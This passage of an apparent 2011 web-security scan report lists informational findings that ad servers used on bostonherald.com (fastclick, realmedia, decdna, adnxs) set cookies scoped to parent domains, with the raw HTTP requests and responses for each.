2C+2132%2C+24319%29%3Bppv%2887%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28619%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28620%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28621%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb266870=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Thu, 28-Apr-2011 22:43:52 GMT; domain=.adnxs.com; HttpOnly
Date: Fri, 28 Jan 2011 22:43:52 GMT
Content-Length: 335

document.write('<scr' + 'ipt language=\"JavaScript\">\nvar zflag_nid=\"951\"; var zflag_cid=\"2\"; var zflag_sid=\"2\"; var zflag_width=\"300\"; var zflag_height=\"250\"; var zflag_sz=\"9\"; var zflag
...[SNIP]...

10.96. http://media.fastclick.net/w/click.here

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/click.here

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/click.here?cid=276818;mid=522556;m=1;sid=54393;c=0;tp=5;forced_click=\ HTTP/1.1
Host: media.fastclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;

Response

HTTP/1.1 302 Redirect
Date: Sat, 29 Jan 2011 05:00:38 GMT
Location: \
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: srb=BAEAAAABIAMDPnJDTSAGYAsCLywEIAmACwAGIAcDAAAAAA==; domain=.fastclick.net; path=/; expires=Mon, 31-Jan-2011 05:00:38 GMT
Set-Cookie: oatmeal=10070:256698:477674:54816:0:1295977917:3|10489:276818:522556:54393:0:1296277238:0|; domain=.fastclick.net; path=/; expires=Mon, 28-Feb-2011 05:00:38 GMT
Set-Cookie: adv_ic=...[SNIP]...; domain=.fastclick.net; path=/; expires=Sun, 29-Jan-2012 05:00:38 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Mon, 28-Jan-2013 05:00:38 GMT
Keep-Alive: timeout=5, max=19972
Connection: Keep-Alive


10.97. http://media.fastclick.net/w/get.media

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/get.media

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/get.media?sid=54393&tp=5&d=j&t=n HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; vt=10070:256698:477674:54816:0:1295925050:3|10358:244443:513092:57358:0:1296072859:0|; pjw=BAMAAAACIAMDXNVATSAGCAABAQAA/EgCACAG4AAAAAMgCQHPpqAfICwAwCAP4AMfAAYgDwDHwB8gGATrdAIAUyATwAADBgAAAA==; adv_ic=...[SNIP]...; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:43:52 GMT
Content-Type: application/x-javascript
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 405
Set-Cookie: pjw=BAEAAAACIAMDqEZDTSAGAQABIAMCUjkEYAcCPPkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Sun, 30-Jan-2011 22:43:52 GMT
Set-Cookie: vt=10070:256698:477674:54816:0:1295925050:3|10489:276818:522556:54393:0:1296254632:0|; domain=.fastclick.net; path=/; expires=Sun, 27-Feb-2011 22:43:52 GMT
Set-Cookie: adv_ic=BxMAAACoRkNNIAYGAAFJAAACWyAHIAtAAAJc1UDgABcBZDjgARcBHrOgFwdDAACpSAAAYEAsIAACvQ0/gC8gFwQbWQAAdiATQAAAi8AXIF8EzU8AAANAFCAAAG3gAhcBdlzgAV8AVeACFwFHU+ABFwA34AIXAQZM4AEXADPgAhcB1kvgARcAJuACFwEPXuABFwAD4AIXABjgAhcB/gygvyCnAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwDV4ALXAMTgAhcAFeACLwCr4AIXAXlH4AF3AKjgAhcAoOACLwI7Pz6BZyCnQWcAkSFLAwAAAAA=; domain=.fastclick.net; path=/; expires=Sat, 28-Jan-2012 22:43:52 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Sun, 27-Jan-2013 22:43:52 GMT

{var dz=document;
dz.writeln("<iframe src=\"http://view.atdmt.com/AVE/iview/286758469/direct;wi.728;hi.90/01/20110128224352/?click=http://media.fastclick.net/w/click.here?cid=276818;mid=522556;m=1;sid
...[SNIP]...

10.98. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it

Summary

Severity:   Information
Confidence:   Certain
Host:   http://na.link.decdna.net
Path:   /n/49881/49889/www.247realmedia.com/1ykg1it

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /n/49881/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:16:08 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:16:08 GMT
location: http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&0&pq=%2fEN%2dUS%2f&1pixgif&referer=&bounced
Set-Cookie: %2edecdna%2enet/%2fn%2f49881/2/e=1296224168/49881/49889/0/0//0///0/0/0/0///0/0//0//0/0; expires=Sun, 27-Feb-2011 14:16:08 GMT; path=/n/49881; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9286424825562137129; expires=Sat, 28-Jan-2012 14:16:08 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9286424825511805852; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


10.99. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/ HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:02:21 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFL=011Pj2x3U10EfJ|U10Eo1|U10yOK|U1014lt|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 414
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:21 GMT;path=/

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/434939665/UNKNOWN/USNetwork/BCN2010040564_000_EmpireState/1x1trans.gif/72634857383
...[SNIP]...

10.100. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O8016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:27:11 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:18:14 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.101. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O1012Mr|O1016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:46 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:48 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.102. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O1012Mr|O2016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:03 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:06 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.103. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiQmF81012Mr|O1016GB; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:37 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:40 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.104. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O3016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:09 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:11 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.105. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O6016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:18:57 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3622
Content-Type: application/x-javascript
